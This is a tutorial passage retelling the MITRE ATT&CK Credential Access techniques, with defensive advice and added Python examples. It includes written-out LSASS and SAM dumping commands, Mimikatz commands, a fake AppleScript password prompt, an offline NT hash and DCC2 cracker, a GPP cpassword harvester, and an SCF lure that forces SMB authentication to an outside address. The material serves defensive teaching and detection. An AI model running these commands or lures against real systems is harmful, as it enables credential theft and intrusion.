
We study Adversarial Tactics, Techniques & Common Knowledge (ATT&CK). Enterprise Tactics. Part 6

Credential Access


Links to all parts:
Part 1. Getting Initial Access
Part 2. Execution
Part 3. Persistence
Part 4. Privilege Escalation
Part 5. Defense Evasion
Part 6. Credential Access
Part 7. Discovery
Part 8. Lateral Movement

Having obtained credentials, an attacker gains access to, or even control over, system, domain or service accounts. The adversary typically tries to obtain legitimate credentials of user and administrative accounts so as to log in as that account and inherit all of its permissions, which makes malicious activity harder for defenders to distinguish from normal use. Where possible, the adversary may also create accounts for later use in the attacked environment.

The author is not responsible for any consequences of applying the information in this article, and apologises for any inaccuracies in some formulations and terms. The published information is a free retelling of the content of MITRE ATT&CK.

Account Manipulation


System: Windows
Rights: Administrator
Description: Account manipulation is aimed at maintaining a level of access in the attacked environment. It includes changing permissions, account settings and the way an account authenticates, and adding the account to, or changing, access groups. An attacker may also undermine security policies such as password expiration in order to extend the life of compromised accounts. To create or manage accounts, the adversary must already hold sufficient permissions on the system or in the domain.

Security recommendations: Use multifactor authentication. Protect domain controllers by restricting access to them. Do not use domain administrator accounts on unprivileged systems or for day-to-day work, where they are more likely to be compromised. Audit changes to privileged groups and to account attributes such as "password never expires".

Bash history


System: Linux, macOS
Rights: User
Description: Bash keeps a history of the commands a user types. When the user logs out, the history is written to ~/.bash_history; by default the file holds the last 500 commands. Users frequently pass usernames and passwords as command-line arguments, and these end up in ~/.bash_history as well. Attackers read the ~/.bash_history files of the various system users in the hope of finding credentials.

Security recommendations: There are several ways to keep commands out of ~/.bash_history:
• set +o history - stop recording history in the current shell;
• set -o history - resume recording;
• unset HISTFILE - add to ~/.bashrc so that no history file is written;
• ln -s /dev/null ~/.bash_history - send the history file to /dev/null.
None of these retroactively removes credentials already written to the file, and a user can re-enable history at will, so auditing the file's contents is still worthwhile.

Brute Force


System: Windows, Linux, macOS
Rights: User
Description: An adversary resorts to password guessing when credentials are unknown or no password hash could be obtained. With hashes in hand, the adversary can guess passwords offline by systematically computing candidate hashes or by using rainbow tables; such cracking is usually done outside the attacked system. Without a hash, the attacker can attempt to log in with an empty password or with values from a list of likely passwords. Depending on the password policy, this produces many failed authentications and can lock the account, so the adversary may instead use password spraying: trying a small number of the most common or probable passwords against many accounts. This reduces the chance of lockouts compared with trying many passwords against a single account.

Security recommendations: Apply an account lockout policy after a set number of failed login attempts. Consider multifactor authentication. Follow the recommendations for preventing unauthorised use of existing accounts (see the protection recommendations for the Valid Accounts technique).

Credential Dumping


System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Credential dumping is the process of obtaining usernames and passwords, usually as a hash or in plaintext, from the operating system or software. Credential dumping tools are used by attackers and by security testers alike.

Windows
SAM (Security Account Manager)
SAM is the database of local accounts on a host. As a rule, SAM holds the accounts shown by the "net user" command. Reading SAM requires SYSTEM-level access. There are many tools for extracting SAM data from memory:
• pwdumpx.exe;
• gsecdump;
• Mimikatz;
• secretsdump.py (Impacket).

The SAM hive, together with the SYSTEM hive that holds the boot key needed to decrypt it, can be saved from the registry with the REG utility:
reg save HKLM\sam sam
reg save HKLM\system system


Creddump7 can then extract the hashes from the saved SAM hive using the boot key from the SYSTEM hive.
Note: RID 500 is the built-in local Administrator account and RID 501 the Guest account; user accounts start at RID 1000.

Cached credentials (DCC2)
Domain Cached Credentials v2 (DCC2) is the credential cache used in Windows Vista and later to authenticate a domain user when no domain controller is reachable. The number of cached logons can be configured per system. DCC2 hashes are salted with the username and cannot be used in pass-the-hash attacks; they can only be cracked offline. The cache lives in the SECURITY hive and can be extracted with the same tools as SAM:
• pwdumpx.exe;
• gsecdump;
• Mimikatz;
• secretsdump.py
Alternatively, Reg (saving the SECURITY and SYSTEM hives) and Creddump7 can be used. Since Windows Vista, cached credentials are derived with PBKDF2 (the standard for deriving a key from a password), which makes each guess considerably more expensive than for an NT hash.
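To make the difference between the two hash types concrete, here is an added example (not code from the original article or from any of the tools it lists) that builds the NT hash stored in SAM, derives the DCC2 value from it, and runs the offline guessing step that follows a dump, which is also the "offline" half of the Brute Force technique above. MD4 is implemented in pure Python because hashlib may not expose it on OpenSSL 3 builds; the wordlist and the "dumped" hashes are constructed for the demo.

```python
# Added example: NT hash (MD4 over UTF-16LE) as dumped from SAM, the DCC2
# derivation that salts and stretches it, and an offline dictionary attack.
import hashlib
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. NT hashes are MD4 over the UTF-16LE password, unsalted."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, const, order, shifts in rounds:
            for i in range(16):
                idx = (-i) % 4  # update a, d, c, b, a, d, ... as in the RFC
                x, y, z = v[(idx + 1) % 4], v[(idx + 2) % 4], v[(idx + 3) % 4]
                t = (v[idx] + fn(x, y, z) + X[order[i]] + const) & _MASK
                v[idx] = _rotl(t, shifts[i % 4])
        state = [(s + w) & _MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The value SAM / NTDS.dit stores: no salt, so it is pass-the-hash material."""
    return md4(password.encode("utf-16-le")).hex()


def dcc2_hash(username: str, password: str, iterations: int = 10240) -> str:
    """Domain Cached Credentials v2 (MS-Cache v2): DCC1 = MD4(NT hash || lowercase user),
    then PBKDF2-HMAC-SHA1 with the lowercase username as salt. The salt ties the value to
    one account and the 10240 iterations make every offline guess cost that much work."""
    user = username.lower().encode("utf-16-le")
    dcc1 = md4(bytes.fromhex(nt_hash(password)) + user)
    return hashlib.pbkdf2_hmac("sha1", dcc1, user, iterations, 16).hex()


def crack_offline(target_hash: str, username: str, wordlist, kind: str = "nt"):
    """The step after a dump: guess against the hash without touching the victim's
    authentication system, so there is no lockout and no failed-logon event."""
    for guess in wordlist:
        h = nt_hash(guess) if kind == "nt" else dcc2_hash(username, guess)
        if h == target_hash.lower():
            return guess
    return None


# Constructed wordlist for the demo.
SAMPLE_WORDLIST = ["123456", "Welcome1", "password", "Summer2019!"]

if __name__ == "__main__":
    print(nt_hash("password"))
    print(crack_offline("8846f7eaee8fb117ad06bdd830b7586c", "alice", SAMPLE_WORDLIST))
    print(crack_offline(dcc2_hash("alice", "Welcome1"), "alice", SAMPLE_WORDLIST, "dcc2"))
```

Two practical points follow from the code: the NT hash of a given password is identical on every host and for every user, which is exactly why it can be replayed (pass-the-hash) and why a shared local administrator password is equivalent to one password everywhere, and the DCC2 value for the same password differs per account and costs 10240 HMAC iterations per guess, so it can neither be replayed nor cracked at NT-hash speed.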

Local Security Authority (LSA) Secrets
LSA Secrets are a cached credential store in which the system keeps credentials such as user passwords, service account passwords, Internet Explorer passwords, SQL passwords and other private data, including the encryption keys for cached domain passwords. With SYSTEM-level permissions, LSA Secrets can be read from the registry at:
HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
When services run in the context of a local or domain account, their passwords are stored here. If automatic logon is enabled, that account's password is stored here as well. The same tools as for the previous dumping methods work against LSA Secrets:
• pwdumpx.exe;
• gsecdump;
• Mimikatz;
• secretsdump.py
The SECURITY hive can be saved with the REG utility in the same way as SAM, and the secrets decrypted with Creddump7. Passwords recovered from LSA Secrets are UTF-16 encoded, i.e. effectively plaintext. Windows 10 adds further protection for LSA Secrets (see Credential Guard below).

NTDS from Domain Controller
For authentication and authorisation, AD stores information about domain members, both devices and users. The AD database lives on each domain controller, by default in %SystemRoot%\NTDS\Ntds.dit.
The following methods and tools are used to extract hashes from the AD database:
• Volume Shadow Copy (a shadow copy of the volume, since the file is locked while AD is running);
• ntdsutil.exe;
• secretsdump.py;
• Invoke-NinjaCopy.

Group Policy Preference (GPP) Files
GPP, or Group Policy Preferences, are XML files describing various domain policy settings, such as mapping a network drive in the context of a specific account or creating local accounts on domain-joined systems. Such files may contain credentials, stored in a cpassword attribute encrypted with an AES key that Microsoft has published. Group policies are stored in the SYSVOL share of the domain controller, so any domain user can read GPP files and decrypt the passwords they contain with tools such as:
• Metasploit (post/windows/gather/credentials/gpp);
• Get-GPPPassword;
• gpprefdecrypt.py.
To list all XML files on the SYSVOL share, run from the share root:
dir /s *.xml
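As an added example (not code from the original article or from the tools listed above), the hunt that "dir /s *.xml" starts can be finished by parsing every XML file and pulling out each element that carries a cpassword together with the account it belongs to. The Groups.xml below is constructed for the demo, including its cpassword value; the attribute names are those used by the GPP schemas, and actual decryption (AES-256-CBC with the published key and a zero IV) is left to an AES library or to the tools above.

```python
# Added example: find cpassword entries in Group Policy Preference XML files.
import base64
import os
import xml.etree.ElementTree as ET

# Attributes that name the account a cpassword belongs to in the different GPP
# files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "newName")


def fix_base64_padding(cpassword: str) -> bytes:
    """GPP writes the base64 value without '=' padding; restore it before decoding."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))


def find_gpp_credentials(xml_text: str, path: str):
    """Return one record per element that carries a cpassword attribute."""
    root = ET.fromstring(xml_text)
    found = []
    for elem in root.iter():
        cpass = elem.attrib.get("cpassword")
        if not cpass:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), None)
        found.append({
            "file": path,
            "element": elem.tag,
            "account": account,
            "cpassword": cpass,
            # AES-CBC ciphertext, so the decoded length is a multiple of 16 bytes.
            "ciphertext_len": len(fix_base64_padding(cpass)),
        })
    return found


def scan_sysvol(root_dir: str):
    """Walk a local copy or mount of SYSVOL and collect every cpassword found."""
    hits = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8-sig") as fh:
                    hits.extend(find_gpp_credentials(fh.read(), full))
            except (OSError, ET.ParseError):
                continue  # unreadable or not well-formed XML: skip, keep scanning
    return hits


# Constructed sample in the shape of Policies\{GUID}\Machine\Preferences\Groups\Groups.xml
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2"
        changed="2019-01-10 08:15:00" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="LocalAdmin"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for rec in find_gpp_credentials(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(rec)
```

Run scan_sysvol against a mounted \\<domain>\SYSVOL (or a copy of it) to enumerate every policy that still ships a password; the same scan serves the defender who wants to remove such files, as recommended under Credentials in Files.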

Service Principal Names (SPNs)
see the Kerberoasting technique

Plaintext Credentials
After a user logs on, a variety of credentials are generated and kept in memory by the Local Security Authority Subsystem Service (LSASS) process. These credentials can be harvested by a user with Administrator or SYSTEM privileges.

SSPI (Security Support Provider Interface) provides a common interface for several Security Support Providers (SSPs). SSP are software modules (DLLs) containing one or more authentication and cryptography schemes that are loaded into the LSASS process at system startup.

Some SSPs can be used to obtain credentials:
• Msv: interactive logons, batch logons (for example Task Scheduler jobs) and service logons via the MSV authentication package;
• Wdigest: the Digest Authentication protocol, designed for network authentication with HTTP and SASL (Simple Authentication and Security Layer); when enabled, it keeps plaintext passwords in memory;
• Kerberos: domain authentication in Windows 2000 and later;
• CredSSP: single sign-on (SSO, which lets users authenticate once and access resources without re-entering credentials) and Network Level Authentication (used by Remote Desktop Services).

Credential Tools:
• Windows Credential Editor (WCE);
• Mimikatz.

An LSASS process dump can also be saved and analysed later on another system.
On the target host (procdump appends .dmp to the file name):
procdump -ma lsass.exe lsass_dump

Then, on another system, Mimikatz is run:
sekurlsa::minidump lsass_dump.dmp
sekurlsa::logonpasswords

DCSync
DCSync is a form of credential dumping from a domain controller. Instead of running detectable malicious code on the DC, the attacker abuses the domain controller API to impersonate the replication process of another domain controller. Members of Administrators, Domain Admins and Enterprise Admins, and domain controller computer accounts, can run DCSync to retrieve password data from AD, including the hashes of the KRBTGT account (the service account of the Key Distribution Center) and of Administrator. These hashes can then be used to forge a Golden Ticket for a Pass the Ticket attack, or to change a password as part of Account Manipulation. DCSync is implemented in the lsadump module of Mimikatz; lsadump also supports NetSync, which replicates over the legacy Netlogon protocol.

Linux
Proc file system
Proc is a special file system on Unix-like systems that presents information about processes and other system state as a hierarchy of pseudo-files (which exist in RAM rather than on disk) and serves as an interface to the kernel. Processes running as root can read the memory of other running programs through it. If a program holds passwords in plaintext or as hashes in memory, those values can be extracted from /proc for direct use or for offline recovery of the password from the hash. GNOME Keyring, sshd and Apache are among the programs that keep such authentication artefacts in memory. This is implemented in the open-source tool MimiPenguin, which dumps process memory and then searches it for passwords and hashes using text strings and regular expressions.

Protection recommendations:
Windows
Monitor access to LSASS and SAM by tools that are permitted on the protected system. Restrict account rights across systems and network segments so that an attacker who obtains passwords or hashes cannot move freely through the network. Ensure the local administrator account has a complex, unique password on every system and in every network segment. Do not place user or domain administrator accounts in local administrator groups across many systems: that is equivalent to all administrators sharing one password. Follow Microsoft's guidance on enterprise network design and administration. On Windows 8.1 and Windows Server 2012 R2 and later, enable LSA protection (Protected Process Light, RunAsPPL).

Identify and block potentially dangerous and malicious software that can be used to get credential dumps.

Windows 10 introduces a new mechanism for protecting LSA secrets, Windows Defender Credential Guard. With it, the LSA process no longer holds secrets in its own memory but talks to a new component, an isolated LSA process that stores and protects them. Data in the isolated process is protected by virtualization-based security and is not accessible to the rest of the operating system; LSA communicates with it via remote procedure call (RPC). Credential Guard is not enabled by default and has hardware and software requirements. It is also not absolute protection against every form of credential dumping.

Manage the Replicating Directory Changes permissions and other permissions related to domain controller replication. Consider disabling or limiting NTLM traffic. Monitor process creation and command-line arguments for indicators of credential dumping; for example, remote access toolkits may bundle Mimikatz, or PowerShell scripts such as PowerSploit's Invoke-Mimikatz.

Monitor domain controller replication logs for unscheduled replication or replication requests, and watch for replication requests originating from IP addresses that are not domain controllers.

Linux
To obtain passwords and hashes from memory, a process must open /proc/<PID>/maps (and read /proc/<PID>/mem) for the target process, where PID is the target's process id. auditd can be used to watch for processes opening these files and to report the PID, process name and arguments of the offending program.

Credentials in Files


System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Attackers can search for files containing passwords on local file systems and remote shares. These may be files users created to store their own credentials, shared credential stores used by a group, configuration files containing passwords for systems or services, source code, and binaries with embedded passwords.
Using credential dumping tools, passwords can also be extracted from backups, images and snapshots of virtual machines. Passwords may also be present in Group Policy Preference (GPP) files stored on a domain controller.

Security recommendations: Establish organisational policy that prohibits storing passwords in files. Make sure developers and system administrators understand the risk of keeping plaintext passwords in software configuration files. Periodically scan systems for files containing passwords and remove them. Restrict sharing of directories by granting permissions only to the users who need them. Remove GPP files that contain passwords.

Credentials in Registry


System: Windows
Rights: User, Administrator
Description: Attackers can search the Windows registry for credentials and passwords stored there for use by programs or services, including those stored for automatic logon. Example commands for finding password strings:
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s


Security recommendations: Do not store credentials in the registry. Monitor the registry for stored credentials. Where credentials must be stored, the software should restrict permissions on the keys so that only the account that needs them can read them.

Exploitation for Credential Access


System: Windows, Linux, macOS
Rights: User
Description: Errors made by the developers of authentication and authorization mechanisms may be the cause of software vulnerabilities in which an attacker can gain unauthorized access to credentials. For example, bulletin MS14-068 describes a vulnerability in the Kerberos protocol, with which an attacker can fake Kerberos tickets using domain user rights. Exploiting vulnerabilities to obtain credentials can also be used to elevate privileges.

Security recommendations: Keep software up to date through centralised patch management for enterprise workstations and servers. Develop and follow a threat-intelligence process that identifies the threats relevant to your organisation. Use sandboxing, virtualization and microsegmentation to make it harder for an attacker to progress by exploiting vulnerabilities. On Windows, Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can detect and block exploitation activity. Control-flow integrity (CFI) tools are another way to prevent exploitation: CFI is the general name for techniques that restrict a program's execution to a predefined control-flow graph. Many of these defences can be bypassed if the exploit is written with them in mind, and their applicability depends on the architecture of the program and its binaries.

Forced Authentication


System: Windows
Rights: User
Description: Server Message Block (SMB) is commonly used for authentication and communication between Windows systems for file and resource sharing. When Windows connects to a remote system over SMB, it automatically tries to authenticate and sends the current user's credentials (as an NTLM challenge-response) to the remote system, so the user does not have to enter credentials to reach network resources, which is typical of a corporate environment. When SMB is unavailable, Windows falls back to Web Distributed Authoring and Versioning (WebDAV), an extension of HTTP that normally runs over TCP ports 80 and 443.

By forcing SMB authentication, attackers abuse this behaviour of the attacked system to obtain account hashes. Using phishing, the attacker sends the victim a link to an external resource under the attacker's control, or places a special file on the desktop or on a shared folder. When the user's system accesses the untrusted resource, it attempts to authenticate and sends the current user's NTLM hash (in challenge-response form) over SMB to the remote server. Having captured it, the attacker can brute-force it offline to recover the plaintext password, or relay the authentication to another host; a captured challenge-response cannot itself be used for pass-the-hash.

The most popular ways to force SMB authentication:
• A phishing attachment containing a document with active content that loads automatically when the document is opened. The document may reference a template such as file://[remote address]/Normal.dotm, which triggers SMB authentication.

• A modified .lnk or .SCF (Shell Command File) whose properties point, instead of at a local icon file, at an external path \\[remote address]\pic.png. The system tries to fetch the icon and so opens the link.

Security Recommendations: Block outgoing SMB traffic sent outside the corporate network by filtering and blocking TCP ports 139, 445 and UDP port 137. Filter and block WebDAV traffic out of the corporate network. If access to external resources via SMB and WebDAV is necessary, then limit external connections using whitelists.
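As an added example (not code from the original article), the .SCF lure described above is written out in its actual file format, and a small check then scans arbitrary file text for UNC or file:// references that would make a Windows client authenticate to a host outside the corporate network. The internal address ranges and DNS suffix (corp.example) are assumptions for the demo, as are the hosts and addresses used.

```python
# Added example: build the SCF forced-authentication lure and flag external
# UNC / file:// references in files before they reach a share or a desktop.
import ipaddress
import re

# \\host\share\... and file://host/... references both trigger SMB (or WebDAV) authentication.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")
FILE_URL_RE = re.compile(r"file://([A-Za-z0-9._-]+)/", re.IGNORECASE)
# Assumed corporate address space and DNS suffix (not from the article).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIX = ".corp.example"


def build_scf_lure(unc_icon_path: str) -> str:
    """Shell Command File whose icon lives on a remote share. Explorer fetches the icon,
    and therefore authenticates over SMB, as soon as the folder holding the file is viewed."""
    return "\n".join(["[Shell]", "Command=2", f"IconFile={unc_icon_path}",
                      "[Taskbar]", "Command=ToggleDesktop", ""])


def referenced_hosts(text: str):
    """Every host a file would make the client reach out to."""
    return set(UNC_RE.findall(text)) | set(FILE_URL_RE.findall(text))


def is_external(host: str) -> bool:
    """A literal IP outside the internal ranges, or an FQDN outside the corporate suffix.
    Bare single-label names are treated as internal (they resolve via the local domain)."""
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        return "." in host and not host.lower().endswith(INTERNAL_SUFFIX)


def find_forced_auth_refs(text: str):
    """Hosts referenced from a file (.scf, .url, .lnk metadata, document XML) that would
    trigger outbound SMB/WebDAV authentication to a non-corporate destination."""
    return sorted(h for h in referenced_hosts(text) if is_external(h))


if __name__ == "__main__":
    lure = build_scf_lure(r"\\203.0.113.10\share\pic.png")
    print(lure)
    print(find_forced_auth_refs(lure))
```

The egress filter in the recommendation above is still the primary control: the check only catches references that are visible as text, and a .lnk stores its icon path in a binary structure that this simple scan will not always see.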

Hooking


System: Windows
Rights: Administrator, System
Description: Windows API functions are usually implemented in DLLs. Hooking redirects calls to API functions by means of:

• Hook procedures: built-in OS mechanisms that run code on events such as keystrokes or mouse movement;

• Modification of the Import Address Table (IAT), which stores the pointers to API functions; this tricks the application into calling the malicious function instead;

• Direct modification of the function (inline hooking, or splicing), in which the first 5 bytes of the function are overwritten with a jump to a malicious or attacker-chosen function.

Like injections, attackers can use hooking to execute malicious code, disguise its execution, access the memory of the attacked process, and elevate privileges. Attackers can capture API calls that include parameters containing authentication data.
Hooking is usually used by rootkits to hide malicious activity in the system.

Security recommendations: Hooking is part of normal OS operation, so restricting it may break legitimate applications such as antivirus software. Efforts to prevent hooking should focus on earlier stages of the kill chain. Monitor calls to the hooking APIs SetWindowsHookEx and SetWinEventHook, and use rootkit detectors to look for IAT and inline hooks in running processes.

Input Capture


System: Windows, Linux, macOS
Rights: Administrator, System
Description: Attackers capture user input to obtain credentials.
Besides keylogging, input can be captured through fake UAC prompts and malicious Windows Credential Providers that ask for and record credentials.

Fake web portals, such as a cloned VPN login page, can also be used to collect credentials.

Security recommendations: Use application whitelisting tools such as AppLocker to prevent unauthorised software from running.

Follow Microsoft's guidance on securing privileged access (administrative forest design approach): https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

Monitor calls to the keylogging APIs SetWindowsHook, GetKeyState and GetAsyncKeyState. These calls alone are not proof of malice, so correlate them with other suspicious behaviour. Check the registry for custom credential providers registered under:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers

Input Prompt


System: macOS
Rights: User
Description: When an attacker needs credentials that cannot be obtained otherwise, the user can simply be asked for them with a dialog that imitates a legitimate application's request for authentication. An example using AppleScript:

set thePassword to the text returned of (display dialog "AdobeUpdater needs permission to check for updates. Please authenticate." default answer "")

Security recommendations: Train users to be suspicious of unexpected authentication prompts. Consider whitelisting which applications may run AppleScript.

Kerberoasting


System: Windows
Rights: User
Description: A Service Principal Name (SPN) uniquely identifies a service instance and ties it to a service account in Kerberos. SPNs are registered on accounts in AD and can be enumerated by any domain user.

Any valid domain user holding a Kerberos ticket-granting ticket (TGT) can request one or more service tickets from the ticket-granting service (TGS) for any SPN. Part of each service ticket is encrypted with the hash of the service account's password, typically with RC4 (Kerberos 5 TGS-REP etype 23). Tickets can be extracted from memory or captured from Kerberos traffic and then brute-forced offline to recover the service account's plaintext password.

Security recommendations: Use long (25+ characters), complex passwords for service accounts. Starting with Windows Server 2012, use Group Managed Service Accounts (gMSA), whose passwords are generated automatically and rotated regularly.

Limit the privileges of service accounts; do not place them in Domain Admins.
Enable AES encryption for Kerberos instead of RC4 wherever possible.

Enable auditing of Kerberos Service Ticket Operations to log TGS requests. Monitor Event ID 4769 for an abnormal number of service ticket requests from one account and for tickets issued with RC4 (Ticket Encryption Type: 0x17).
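The two domain-controller-side detections named on this page, replication requests from accounts that are not domain controllers (DCSync, above under Credential Dumping) and bursts of RC4 service-ticket requests (Event ID 4769, Kerberoasting), are shown below as an added example, not code from the original article. The records are constructed dictionaries whose keys follow the field names of the Windows Security event XML (EventID, SubjectUserName, Properties, ServiceName, TicketEncryptionType); the GUIDs are the real control-access rights that DCSync requires, and the threshold of five SPNs per account is an assumed tuning value.

```python
# Added example: DCSync (4662 + replication GUIDs) and Kerberoasting (4769 + RC4)
# detection logic over constructed Security-log records.
from collections import defaultdict

# Control-access-right GUIDs DCSync needs: DS-Replication-Get-Changes,
# DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set.
REPLICATION_GUIDS = (
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
)
RC4_HMAC = "0x17"  # Ticket Encryption Type for RC4-HMAC in event 4769


def detect_dcsync(events, dc_accounts):
    """Event 4662 whose Properties carry a replication GUID, raised by any account
    that is not a known domain controller computer account (DC-to-DC replication is normal)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        subject = ev.get("SubjectUserName")
        if any(g in props for g in REPLICATION_GUIDS) and subject not in dc_accounts:
            alerts.append(("DCSync", subject, ev.get("IpAddress")))
    return alerts


def detect_kerberoast(events, threshold=5):
    """Event 4769: one account requesting RC4 (0x17) service tickets for many distinct
    services in the batch. krbtgt and computer accounts ($) are skipped: they are not
    roastable targets and produce normal RC4 noise in mixed domains."""
    per_user = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        per_user[ev.get("TargetUserName")].add(svc)
    return [("Kerberoast", user, len(spns)) for user, spns in per_user.items() if len(spns) >= threshold]


# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    # DC-to-DC replication: benign.
    {"EventID": 4662, "SubjectUserName": "DC02$", "IpAddress": "10.0.0.11",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account asking for replication rights: DCSync.
    {"EventID": 4662, "SubjectUserName": "jdoe", "IpAddress": "10.0.0.55",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # An AES service ticket for a file server: normal.
    {"EventID": 4769, "TargetUserName": "alice@CORP.EXAMPLE", "ServiceName": "FS01$",
     "TicketEncryptionType": "0x12"},
]
# One low-privileged user pulling RC4 tickets for six different service accounts.
SAMPLE_EVENTS += [
    {"EventID": 4769, "TargetUserName": "svc_scan@CORP.EXAMPLE", "ServiceName": f"svc_app{i}",
     "TicketEncryptionType": "0x17"}
    for i in range(6)
]
SAMPLE_EVENTS.append({"EventID": 4769, "TargetUserName": "svc_scan@CORP.EXAMPLE",
                      "ServiceName": "krbtgt", "TicketEncryptionType": "0x17"})

if __name__ == "__main__":
    print(detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}))
    print(detect_kerberoast(SAMPLE_EVENTS))
```

Both rules need the corresponding audit subcategories enabled on the domain controllers (Directory Service Access for 4662, Kerberos Service Ticket Operations for 4769), and in a domain that still issues RC4 tickets to many legacy services the Kerberoasting threshold should be tuned per environment rather than taken from this example.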

Keychain


System: macOS
Rights: root
Description: Keychain is the built-in macOS credential store, holding Wi-Fi passwords, website and application passwords, certificates and Kerberos credentials, among others. Keychain files are located in:
• ~/Library/Keychains;
• /Library/Keychains;
• /Network/Library/Keychains/.

Keychains are managed with the macOS security command-line utility.
To access a keychain's contents, its password is needed; by default the login keychain's password is the user's login password. An attacker who obtains that password (for example via Input Prompt or Input Capture) can read every credential stored in the keychain.

Security recommendations: Keychain cannot be disabled without breaking macOS, so protect the credentials that unlock it; setting the login keychain password to differ from the login password forces an attacker to obtain a second secret.

LLMNR/NBT-NS Poisoning


System: Windows
Rights: User
Description: Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Windows name-resolution components that act as a fallback when DNS fails. LLMNR is based on DNS and lets hosts on the same link resolve each other's names; NBT-NS resolves NetBIOS names.

An attacker on the local network can answer LLMNR (UDP 5355) and NBT-NS (UDP 137) queries, posing as the requested host. The victim then connects to the attacker's machine and the attacker captures its NTLMv2 challenge-response, which can be brute-forced offline to recover the password or relayed to another system.
Tools implementing this technique include NBNSpoof, Metasploit and Responder.

Security recommendations: Disable LLMNR and NBT-NS in local security settings or via Group Policy if they are not needed.
LLMNR can be disabled through the registry key:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast=dword:00000000
Monitor the network for LLMNR/NBT-NS traffic (UDP 5355 and UDP 137) and for hosts answering such queries that should not be; host-based security software can block the traffic.

Network Sniffing


System: Windows, Linux, macOS
Description: By placing a network interface into promiscuous mode (in which the interface accepts all traffic on the wire) or by using a SPAN port (port mirroring), an attacker can capture traffic in transit, including credentials sent over unencrypted protocols.
Name-resolution poisoning such as LLMNR/NBT-NS Poisoning can be used to redirect traffic to the attacker so that it can be captured.

Sniffing also reveals configuration details (running services, version numbers, IP addresses, hostnames, VLAN IDs and so on) that are useful for lateral movement and/or defence evasion.

Security recommendations: Segment the network and encrypt sensitive traffic so that captured data is of little use; use Kerberos, SSL/TLS and multifactor authentication. Monitor switch configuration for SPAN ports and watch for ARP/DNS spoofing.
Identify and block sniffing tools that are not authorised on the system.

Password Filter DLL


System: Windows
Rights: Administrator, System
Description: Windows password filters are a mechanism for enforcing password policy. They are implemented as DLLs exporting a function that validates a proposed password against policy.

Before a new password is written to the Security Accounts Manager (SAM), the Local Security Authority (LSA) asks every registered filter to validate it. The change does not take effect until every filter accepts it.

To validate, a filter must receive the password in plaintext from the LSA. An attacker who registers a malicious filter DLL therefore receives every new password in plaintext and can store or exfiltrate it.

Security recommendations: Ensure that only legitimate password filters are registered. Filter DLLs must reside in C:\Windows\System32\ and are listed under:
